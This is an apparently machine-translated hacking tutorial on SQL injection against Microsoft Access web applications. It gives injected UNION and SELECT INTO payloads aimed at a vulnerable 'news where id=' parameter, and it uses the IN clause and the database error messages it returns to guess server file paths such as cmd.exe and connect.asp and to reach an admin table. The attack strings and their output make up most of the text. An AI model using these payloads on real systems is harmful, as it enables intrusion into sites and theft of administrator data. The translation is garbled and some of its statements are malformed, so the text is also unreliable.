Text / Amanl
Today, SQL Injection can be described as hot, many new INJECTION methods are excavated. Use the system error to explode the path, but also a hot topic. Today I also make fun.
This example is applied to Access (Since the MS SQL query does not have a specified path), ACEESS has a table that can import a source database to the target database.
Such as: mysource.mdb (admin table) -> myDestion.mdb
If you want to create a new worksheet in an existing external database, you can use the IN keyword. If the external database does not exist or if the data table already exists, the SELECT INTO statement will return an error message.
Select * INTO TBLNEWCUSTOMERS IN 'C: /CUSTOMERS.MDB' from TBLCUSTOMERS.
It is not the application of subquery to turn it into:
Generally there is a vulnerability statement, such as select * from news where id = "& requirements), there is an injection. The following demo uses a set of select * from news whre id =" & requirements) to test . For convenience, the state directly converted to SQL execution:
Select * from news where id = 3 and select * INTO TBLNEWCUSTOMERS IN 'C: /CUSTOMERS.MDB' from TBLCUSTOMERS
Testing is the function of implementing a guide in subquery. This road has been filed. Suddenly I thought of Union, merge operators, see if I can use it.
Note: The Union Operator (Applicable Access)
Although UNION's operation can also be considered a merger query, we cannot see it as a join, which is mentioned because it can synthesize a result form from multiple sources. This is similar to some types of coupling. Union operations are generally used to combine data from a form, a SELECT statement, or a query, and omit any repetitive rows. All data sources must have the same number of domains, but these domains are not necessarily the same data type. Let us assume that we have an employee form, which has the same structure as the customer's work form, then we want to merge the two worksheets to get a list of names and email address information.
SELECT [Last Name], [First Name], Email from Tblcustomers Union Select [Last Name], [First Name], Email from Tblemployees
UNION operations do not display any records that repeated in two forms. Using Union's query statement must be equal to the query statement field column before UNION, such as:
Select ID, Title from news where id = 3 Union Select * from admin
The fields of the query are not equal, return:
Microsoft OLE DB Provider for ODBC DRIVERS Errors '80004005' [Microsoft] [ODBC Microsoft Access Driver] does not match the number of columns in the two data sheets or queries selected in the joint query.
The query statement can be avoided: SELECT ID, TIM news where id = 3 Union Select 1, 1 from admin Simulates as long as the number of 1 is equal to fields, you can also realize queries.
See if you can turn the statement:
Select * from news where id = 3 Union Select * INTO TBLNEWCUSTOMERS INTO TBLNEWCUSTOMERS INTO TBLNEWCUSTOMERS INTO TBLCUSTOMERS Returns:
Microsoft OLE DB Provider for ODBC Drivers Errors '80004005' [Microsoft] [ODBC Microsoft Access Driver] Action Query cannot be used as a source of rows.
The result is still failed. Because Union is only suitable for query. The union cannot follow up. Maybe this road is not going, think about it or not willing.
Try:
Select * from news where id = 3 Union Select * from admin.c
return:
Microsoft Jet Database Engine Errors '80004005' Can't find file 'c: /winnt/system32/admin.mdb'.
This proves and uses Select * from news where id = 3 and 0 <> (Select Count (*) from admin.c) is the same as a successful test path. But think about this method Access always detects the suffix MDB by default, although it is avoided in the above. It is too trouble.
So I was thinking that other methods can be easier to implement, and I remembered the SELECT * INTO TBLNEWCUSTOMERS IN 'C: /CUSTOMERS.MDB' from TBLCUSTOMERS. Is the keyword not to point to the path file name? Can you return it to it.
Then test:
Select * from news where id = 3 Union Select * from admin in 'c: /customers.mdb'
system hint:
Microsoft Jet Database Engine Errors '80004005' Can't find file 'c: /customers.mdb'.
use:
Select * from news where id = 3 Union Select * from admin in 'c: /winnt/system32/cmd.exe'
system hint:
Microsoft Jet Database Engine Errors '80004005' Microsoft Jet Database Engine does not open file 'c: /winnt/system32/cmd.exe'. It has been opened by other users, or no access to data.
This method is more concise than the query of the query with And 0 <> (Select Count (*) from admin), and it is speculated that the MDB suffix is filed, the path and the file name of the speculation are correct, the information will be normal. display. But if you are guessing non-MDB files:
carried out:
Select * from news where id = 3 Union Select * from admin in 'E: / www/include/connect.asp'
return:
Microsoft Ole DB Provider for ODBC Drivers Errors '80004005' [Microsoft] [ODBC Microsoft Access Driver] Unrecognizable Database Format 'E: / WWW/InClude/connect.asp'
The path and document that proves that the path and documents guess are correct.
